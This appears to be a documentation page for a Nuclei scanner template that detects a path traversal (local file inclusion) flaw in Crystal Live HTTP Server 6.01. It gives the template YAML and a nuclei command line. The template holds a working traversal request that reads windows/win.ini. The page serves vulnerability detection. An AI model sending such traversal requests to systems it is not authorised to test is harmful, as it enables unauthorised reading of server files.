Skip to content

Crystal Live HTTP Server 6.01 - Local File Inclusion

ID: crystal-live-server-lfi

Severity: high

Author: 0x_Akoko

Tags: lfi,crystal

Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.

id: crystal-live-server-lfi
info:
name: Crystal Live HTTP Server 6.01 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.
reference: https://cxsecurity.com/issue/WLB-2019110127
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,crystal
http:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 490a00463044021f70e2d1099cd65bfa3faff4245b7e1734dbcb528db44f4ba3c7fb44cfa85525022100cf268aea009ebb6021184ff6b54820b074067e443e74c6052264bc69c6f35f53:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/crystal-live-server-lfi.yaml"

View on Github